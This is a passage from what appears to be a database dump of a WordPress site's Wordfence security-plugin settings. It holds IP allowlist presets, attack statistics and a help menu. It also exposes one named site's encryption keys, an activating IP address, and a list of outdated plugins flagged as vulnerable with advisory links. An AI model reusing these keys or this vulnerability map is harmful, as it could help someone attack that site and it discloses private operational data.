API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":5},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":6}],\"order\":7},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/\",\"excerpt\":\"Wordfence Premium comes with an IP Blacklist, Real Time Protection and much more.\",\"children\":[{\"title\":\"Account\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/account\\/\",\"order\":0},{\"title\":\"Pricing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/pricing\\/\",\"order\":1},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/api-key\\/\",\"order\":2}],\"order\":8},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available a data processing agreement to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services. We also provide a data processing agreement if you qualify as a data controller under the GDPR.\",\"order\":9},{\"title\":\"Site Cleaning and Security Audits\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/security-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":10},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either canâ€™t or donâ€™t want to run the full Wordfence plugin.\",\"order\":11}]}','yes'),('supportHash','39e023120a6fdd05bacb34f7c86670e51fb094577ed8c4f8a4480cb894c7090e','yes'),('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),('touppPromptNeeded','','yes'),('touppBypassNextCheck','0','yes'),('autoUpdateAttempts','0','yes'),('wfPeakMemory','48496640','no'),('previousWflogsFileList','[\"config-livewaf.php\",\"rules.php\",\"ips.php\",\"GeoLite2-Country.mmdb\",\"attack-data.php\",\"config-synced.php\",\".htaccess\",\"template.php\",\"config.php\",\"config-transient.php\"]','yes'),('diagnosticsWflogsRemovalHistory','[]','no'),('encKey','f5e06c0ef475199a','yes'),('longEncKey','5594724e56b2e1a8832203699fb576bbc1d7564268ab181c0f92e78a38e0394c','yes'),('cbl_restOfSiteBlocked','1','yes'),('timeoffset_wf','1','yes'),('lastBlockAggregation','1571971164','yes'),('allowed404s6116Migration','1','yes'),('migration636_email_summary_excluded_directories','1','no'),('fileContentsGSB6315Migration','1','yes'),('config701Migration','1','yes'),('blocks702Migration','1','yes'),('geoIPVersionHash','7b1f8efb28ae9da68439581361a100c2ba1e7061c4cd960f2d80a91c33a54578','yes'),('detectProxyNextCheck','1572107706','no'),('detectProxyNonce','','no'),('allScansScheduled','a:3:{i:0;a:2:{s:9:\"timestamp\";i:1572019799;s:4:\"args\";a:1:{i:0;i:1572019799;}}i:1;a:2:{s:9:\"timestamp\";i:1572278999;s:4:\"args\";a:1:{i:0;i:1572278999;}}i:2;a:2:{s:9:\"timestamp\";i:1572538199;s:4:\"args\";a:1:{i:0;i:1572538199;}}}','yes'),('activatingIP','118.100.21.77','yes'),('cbl_cookieVal','5c125fda0e7dc','yes'),('serverDNS','1571975233;14400;103.6.198.69','yes'),('adminNoticeQueue','a:0:{}','yes'),('wp_home_url','http://bintara.com.my','yes'),('wp_site_url','https://bintara.com.my','yes'),('dbVersion','5.5.62-cll','yes'),('useNoc3Secure','1','yes'),('lastDashboardCheck','1571971164','yes'),('dashboardData','a:4:{s:9:\"generated\";i:1571970769;s:3:\"tdf\";a:3:{s:9:\"community\";i:5710;s:7:\"premium\";i:5711;s:9:\"blacklist\";i:10410;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1571882400;s:1:\"c\";i:7152545;}i:1;a:2:{s:1:\"t\";i:1571886000;s:1:\"c\";i:7225119;}i:2;a:2:{s:1:\"t\";i:1571889600;s:1:\"c\";i:10720686;}i:3;a:2:{s:1:\"t\";i:1571893200;s:1:\"c\";i:12717516;}i:4;a:2:{s:1:\"t\";i:1571896800;s:1:\"c\";i:9694447;}i:5;a:2:{s:1:\"t\";i:1571900400;s:1:\"c\";i:8761613;}i:6;a:2:{s:1:\"t\";i:1571904000;s:1:\"c\";i:8658391;}i:7;a:2:{s:1:\"t\";i:1571907600;s:1:\"c\";i:7428498;}i:8;a:2:{s:1:\"t\";i:1571911200;s:1:\"c\";i:5934212;}i:9;a:2:{s:1:\"t\";i:1571914800;s:1:\"c\";i:5864787;}i:10;a:2:{s:1:\"t\";i:1571918400;s:1:\"c\";i:5893150;}i:11;a:2:{s:1:\"t\";i:1571922000;s:1:\"c\";i:5863932;}i:12;a:2:{s:1:\"t\";i:1571925600;s:1:\"c\";i:5387586;}i:13;a:2:{s:1:\"t\";i:1571929200;s:1:\"c\";i:5391981;}i:14;a:2:{s:1:\"t\";i:1571932800;s:1:\"c\";i:5935868;}i:15;a:2:{s:1:\"t\";i:1571936400;s:1:\"c\";i:5934105;}i:16;a:2:{s:1:\"t\";i:1571940000;s:1:\"c\";i:6356346;}i:17;a:2:{s:1:\"t\";i:1571943600;s:1:\"c\";i:5368225;}i:18;a:2:{s:1:\"t\";i:1571947200;s:1:\"c\";i:6204897;}i:19;a:2:{s:1:\"t\";i:1571950800;s:1:\"c\";i:6297871;}i:20;a:2:{s:1:\"t\";i:1571954400;s:1:\"c\";i:6209564;}i:21;a:2:{s:1:\"t\";i:1571958000;s:1:\"c\";i:6383728;}i:22;a:2:{s:1:\"t\";i:1571961600;s:1:\"c\";i:6746228;}i:23;a:2:{s:1:\"t\";i:1571965200;s:1:\"c\";i:6268885;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1571356800;s:1:\"c\";i:131023350;}i:1;a:2:{s:1:\"t\";i:1571443200;s:1:\"c\";i:125335237;}i:2;a:2:{s:1:\"t\";i:1571529600;s:1:\"c\";i:112408217;}i:3;a:2:{s:1:\"t\";i:1571616000;s:1:\"c\";i:110853721;}i:4;a:2:{s:1:\"t\";i:1571702400;s:1:\"c\";i:136204310;}i:5;a:2:{s:1:\"t\";i:1571788800;s:1:\"c\";i:166446203;}i:6;a:2:{s:1:\"t\";i:1571875200;s:1:\"c\";i:170087024;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1569369600;s:1:\"c\";i:134042117;}i:1;a:2:{s:1:\"t\";i:1569456000;s:1:\"c\";i:145653283;}i:2;a:2:{s:1:\"t\";i:1569542400;s:1:\"c\";i:145951107;}i:3;a:2:{s:1:\"t\";i:1569628800;s:1:\"c\";i:141218423;}i:4;a:2:{s:1:\"t\";i:1569715200;s:1:\"c\";i:145707829;}i:5;a:2:{s:1:\"t\";i:1569801600;s:1:\"c\";i:129766045;}i:6;a:2:{s:1:\"t\";i:1569888000;s:1:\"c\";i:125677036;}i:7;a:2:{s:1:\"t\";i:1569974400;s:1:\"c\";i:111853181;}i:8;a:2:{s:1:\"t\";i:1570060800;s:1:\"c\";i:125166344;}i:9;a:2:{s:1:\"t\";i:1570147200;s:1:\"c\";i:125758202;}i:10;a:2:{s:1:\"t\";i:1570233600;s:1:\"c\";i:121850061;}i:11;a:2:{s:1:\"t\";i:1570320000;s:1:\"c\";i:113785806;}i:12;a:2:{s:1:\"t\";i:1570406400;s:1:\"c\";i:112911935;}i:13;a:2:{s:1:\"t\";i:1570492800;s:1:\"c\";i:113909891;}i:14;a:2:{s:1:\"t\";i:1570579200;s:1:\"c\";i:110495995;}i:15;a:2:{s:1:\"t\";i:1570665600;s:1:\"c\";i:126247899;}i:16;a:2:{s:1:\"t\";i:1570752000;s:1:\"c\";i:136695758;}i:17;a:2:{s:1:\"t\";i:1570838400;s:1:\"c\";i:124388061;}i:18;a:2:{s:1:\"t\";i:1570924800;s:1:\"c\";i:149647875;}i:19;a:2:{s:1:\"t\";i:1571011200;s:1:\"c\";i:141466827;}i:20;a:2:{s:1:\"t\";i:1571097600;s:1:\"c\";i:132099671;}i:21;a:2:{s:1:\"t\";i:1571184000;s:1:\"c\";i:120247357;}i:22;a:2:{s:1:\"t\";i:1571270400;s:1:\"c\";i:132863990;}i:23;a:2:{s:1:\"t\";i:1571356800;s:1:\"c\";i:131023350;}i:24;a:2:{s:1:\"t\";i:1571443200;s:1:\"c\";i:125335237;}i:25;a:2:{s:1:\"t\";i:1571529600;s:1:\"c\";i:112408217;}i:26;a:2:{s:1:\"t\";i:1571616000;s:1:\"c\";i:110853721;}i:27;a:2:{s:1:\"t\";i:1571702400;s:1:\"c\";i:136204310;}i:28;a:2:{s:1:\"t\";i:1571788800;s:1:\"c\";i:166446203;}i:29;a:2:{s:1:\"t\";i:1571875200;s:1:\"c\";i:170087024;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:236066313;}i:1;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:164975862;}i:2;a:2:{s:2:\"cd\";s:2:\"RU\";s:2:\"ct\";i:77762646;}i:3;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:73013326;}i:4;a:2:{s:2:\"cd\";s:2:\"UA\";s:2:\"ct\";i:62592945;}i:5;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:54510937;}i:6;a:2:{s:2:\"cd\";s:2:\"RO\";s:2:\"ct\";i:51224008;}i:7;a:2:{s:2:\"cd\";s:2:\"CA\";s:2:\"ct\";i:49577559;}i:8;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:44458492;}i:9;a:2:{s:2:\"cd\";s:2:\"TR\";s:2:\"ct\";i:43557884;}}}}','yes'),('noc1ScanSchedule','a:3:{i:0;i:1572019800;i:1;i:1572279000;i:2;i:1572538200;}','yes'),('allowMySQLi','1','yes'),('dbTest','a:1:{s:5:\"nonce\";s:64:\"b1b99c9b25eff1a9ede90fdb46e400678fffbe8531eb3bae0b948f41080c75ee\";}','no'),('vulnerabilities_plugin','a:35:{i:0;a:5:{s:4:\"slug\";s:7:\"akismet\";s:9:\"toVersion\";s:5:\"4.1.2\";s:11:\"fromVersion\";s:5:\"4.1.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:5:{s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:9:\"toVersion\";s:3:\"7.8\";s:11:\"fromVersion\";s:4:\"6.92\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:41:\"https://wpvulndb.com/vulnerabilities/9461\";}i:2;a:5:{s:4:\"slug\";s:19:\"all-in-one-seo-pack\";s:9:\"toVersion\";s:6:\"3.2.10\";s:11:\"fromVersion\";s:4:\"2.12\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:41:\"https://wpvulndb.com/vulnerabilities/9915\";}i:3;a:5:{s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:9:\"toVersion\";s:5:\"4.4.2\";s:11:\"fromVersion\";s:5:\"4.4.0\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:41:\"https://wpvulndb.com/vulnerabilities/9898\";}i:4;a:5:{s:4:\"slug\";s:27:\"black-studio-tinymce-widget\";s:9:\"toVersion\";s:5:\"2.6.9\";s:11:\"fromVersion\";s:5:\"2.6.8\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:5;a:5:{s:4:\"slug\";s:14:\"classic-editor\";s:9:\"toVersion\";s:3:\"1.5\";s:11:\"fromVersion\";s:3:\"1.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:6;a:5:{s:4:\"slug\";s:16:\"disable-comments\";s:9:\"toVersion\";s:6:\"1.10.2\";s:11:\"fromVersion\";s:5:\"1.9.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:7;a:5:{s:4:\"slug\";s:9:\"elementor\";s:9:\"toVersion\";s:5:\"2.7.4\";s:11:\"fromVersion\";s:6:\"2.5.14\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:8;a:5:{s:4:\"slug\";s:11:\"hello-dolly\";s:9:\"toVersion\";s:5:\"1.7.2\";s:11:\"fromVersion\";s:5:\"1.7.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:9;a:5:{s:4:\"slug\";s:7:\"jetpack\";s:9:\"toVersion\";s:3:\"7.8\";s:11:\"f